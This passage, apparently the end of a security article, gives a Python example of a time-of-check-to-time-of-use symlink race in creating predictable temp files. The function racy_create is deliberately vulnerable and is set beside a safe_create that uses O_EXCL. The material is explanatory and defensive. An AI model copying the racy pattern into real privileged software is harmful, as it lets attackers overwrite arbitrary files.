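# bug class in general, not Sun's specific flaw.
import os

PATH = "/tmp/cron.12345"  # hypothetical predictable temp-file name

def racy_create(path: str) -> int:
    # BAD: between the exists() check and the open(), an attacker can
    # drop a symlink at `path`, and a privileged process following it
    # will clobber (or create) a file of the attacker's choosing.
    if os.path.exists(path):
        raise FileExistsError(path)
    return os.open(path, os.O_WRONLY | os.O_CREAT, 0o600)

def safe_create(path: str) -> int:
    # GOOD: O_CREAT | O_EXCL makes creation atomic -- the kernel fails
    # the call if anything, including a symlink, already sits at `path`.
    return os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
```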

--Alex Handy